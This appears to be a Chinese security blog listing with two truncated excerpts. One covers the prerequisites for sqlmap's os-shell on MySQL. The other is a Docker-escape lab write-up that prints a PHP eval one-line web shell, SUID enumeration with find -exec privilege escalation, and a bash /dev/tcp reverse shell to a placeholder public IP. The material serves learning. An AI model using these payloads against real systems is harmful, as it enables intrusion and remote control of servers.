sqlmap关于os-shell小记
SqlMap –os-shell 利用MySQL前提条件
拥有dba权限
网站的绝对路径
高版本的mysql需要 show variables like '%secure_file_priv%' 或者select
@@secure;或者show global variables like '%secure%';的结果符合要求,secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。这个参数只能通过修改配置文件后重启mysql修改
如果该变量为空,则变量无效,这时候最容易利用
如果变量为目录的绝对路径,则服务器会将导入和导出操作限制为仅适用于该目录中的文件
如果设置为NULL,则服务器禁用导入和导出操作。
当为php时,magic_quotes_gpc为off,php主动转义的功能关闭**
当执行 –os-shell时,这个时候sqlmap主要做了三件事情:
进行目标的一个基础信息的探测。
上传shell到目标web网站上(sqlmap会自 ...
简单dockers逃逸学习
1. 目标界面
搞半天,没进去。。。。
经过提示,了解到了一句话执行的原理,
1<?php @eval($_POST["cmd"]);?>
一句话在每次执行时,接收变量cmd传进去的参数 cmd=phpinfo(); 使用eval函数执行 phpinfo(); 命令。
了解后就是猜参数名的过程。
2. 提权连上shell后, whoami 查看为www-data权限,
通过uname -a 和 cat /etc/*-release 查看内核版本,没有提权exp
!
利用可执行文件SUID
通过命令查看
1find / -user root -perm -4000 -print 2>/dev/null
12touch suid # 也可以不用创建,只要查找的文件真实存在即可find suid -exec whoami \;
3. 反弹shell ,以及获取完全交互式shell公网nc 监听 端口
bash 反弹
1bash -i >& /dev/tcp/公网ip/端口 0>&1
失败。 ...






